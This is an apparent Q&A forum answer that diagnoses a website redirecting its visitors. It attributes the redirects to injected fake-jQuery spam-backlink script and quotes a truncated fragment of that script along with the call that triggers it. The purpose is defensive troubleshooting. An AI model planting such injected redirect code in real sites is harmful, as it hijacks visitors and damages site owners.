[Solved] site freaking out [closed]


EDIT

This turned out to be another one of the fake jQuery spam backlinks. Basically some code would be inserted in your site’s HTML pretending that they are loading jQuery. Here you can see a bit more details, or you can do a search on your own as well.


This is caused by JS redirection. I guess that the offending code is this:

<script type="text/javascript">StaticRequestInfo={Referer:document.referrer};function EscapeBrowserFrame(){try{if(window.top.location==window.self.location){}...

And

<script type="text/javascript">InitiateFrameRequest();</script>

Also your HTML is a mess – you have two <html> tags, which is completely wrong. Look in your theme directory’s header.php file – this is where you should be able to fix the HTML error. The JS code could be there as well.

7

solved site freaking out [closed]